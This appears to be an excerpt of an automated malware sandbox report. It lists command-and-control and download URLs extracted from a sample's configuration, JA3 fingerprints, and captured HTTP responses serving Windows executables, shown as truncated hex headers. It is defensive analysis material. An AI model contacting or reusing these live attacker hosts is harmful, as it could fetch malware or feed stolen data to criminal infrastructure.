Source: Malware configuration extractor	URLs: 5.42.65.80/8bmeVwqx/index.php
Source: Malware configuration extractor	URLs: http://zexeq.com/lancer/get.php
Source: Malware configuration extractor	URLs: http://bulimu55t.net/
Source: Malware configuration extractor	URLs: http://soryytlic4.net/
Source: Malware configuration extractor	URLs: http://bukubuka1.net/
Source: Malware configuration extractor	URLs: http://novanosa5org.org/
Source: Malware configuration extractor	URLs: http://hujukui3.net/
Source: Malware configuration extractor	URLs: http://newzelannd66.org/
Source: Malware configuration extractor	URLs: http://golilopaster.org/
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199235044780
Source: Malware configuration extractor	URLs: https://t.me/headlist

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:27:34 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 02:20:03 GMTETag: "c2800-5fe9a67cc52f2"Accept-Ranges: bytesContent-Length: 796672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a2 87 f1 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 68 0b 00 00 60 09 00 00 00 00 00 10 7f 00 00 00 10 00 00 00 80 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 14 00 00 04 00 00 a6 64 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 69 0b 00 64 00 00 00 00 40 14 00 a8 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 14 00 20 1a 00 00 90 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 0b 00 00 10 00 00 00 68 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 bd 08 00 00 80 0b 00 00 1a 00 00 00 6c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 7a 00 00 00 40 14 00 00 7c 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 25 00 00 00 c0 14 00 00 26 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:27:38 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 02:20:03 GMTETag: "c2800-5fe9a67cc52f2"Accept-Ranges: bytesContent-Length: 796672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a2 87 f1 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 68 0b 00 00 60 09 00 00 00 00 00 10 7f 00 00 00 10 00 00 00 80 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 14 00 00 04 00 00 a6 64 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 69 0b 00 64 00 00 00 00 40 14 00 a8 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 14 00 20 1a 00 00 90 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 0b 00 00 10 00 00 00 68 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 bd 08 00 00 80 0b 00 00 1a 00 00 00 6c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 7a 00 00 00 40 14 00 00 7c 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 25 00 00 00 c0 14 00 00 26 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:27:48 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 02:20:03 GMTETag: "c2800-5fe9a67cc52f2"Accept-Ranges: bytesContent-Length: 796672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a2 87 f1 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 68 0b 00 00 60 09 00 00 00 00 00 10 7f 00 00 00 10 00 00 00 80 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 14 00 00 04 00 00 a6 64 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 69 0b 00 64 00 00 00 00 40 14 00 a8 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 14 00 20 1a 00 00 90 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 0b 00 00 10 00 00 00 68 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 bd 08 00 00 80 0b 00 00 1a 00 00 00 6c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 7a 00 00 00 40 14 00 00 7c 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 25 00 00 00 c0 14 00 00 26 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:27:49 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Mon, 19 Jun 2023 15:40:57 GMTETag: "55200-5fe7d5c5a74eb"Accept-Ranges: bytesContent-Length: 348672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 65 ad d1 65 21 cc bf 36 21 cc bf 36 21 cc bf 36 b2 82 27 36 20 cc bf 36 4e ba 21 36 35 cc bf 36 4e ba 15 36 4e cc bf 36 4e ba 14 36 03 cc bf 36 28 b4 2c 36 22 cc bf 36 21 cc be 36 5d cc bf 36 4e ba 10 36 20 cc bf 36 4e ba 25 36 20 cc bf 36 4e ba 22 36 20 cc bf 36 52 69 63 68 21 cc bf 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 69 97 04 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 3e 01 00 00 8c 74 01 00 00 00 00 a4 52 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 75 01 00 04 00 00 fc e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 42 01 00 28 00 00 00 00 60 74 01 78 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 34 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be 3c 01 00 00 10 00 00 00 3e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 ef 72 01 00 50 01 00 00 fc 02 00 00 42 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 64 61 00 00 00 a8 16 00 00 00 40 74 01 00 18 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 fa 00 00 00 60 74 01 00 fc 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:27:56 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 21 Jun 2023 02:28:32 GMTContent-Type: application/octet-streamContent-Length: 4531200Last-Modified: Mon, 19 Jun 2023 12:11:37 GMTConnection: keep-aliveETag: "649045f9-452400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 45 90 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 45 00 00 08 00 00 00 00 00 00 9e 38 45 00 00 20 00 00 00 40 45 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 45 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 38 45 00 4b 00 00 00 00 40 45 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 45 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 18 45 00 00 20 00 00 00 1a 45 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 40 45 00 00 06 00 00 00 1c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 45 00 00 02 00 00 00 22 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 38 45 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 22 45 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a fb 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 02:28:14 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 02:20:03 GMTETag: "c2800-5fe9a67cc52f2"Accept-Ranges: bytesContent-Length: 796672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a2 87 f1 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 68 0b 00 00 60 09 00 00 00 00 00 10 7f 00 00 00 10 00 00 00 80 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 14 00 00 04 00 00 a6 64 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 69 0b 00 64 00 00 00 00 40 14 00 a8 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 14 00 20 1a 00 00 90 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 0b 00 00 10 00 00 00 68 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 bd 08 00 00 80 0b 00 00 1a 00 00 00 6c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 7a 00 00 00 40 14 00 00 7c 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 25 00 00 00 c0 14 00 00 26 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 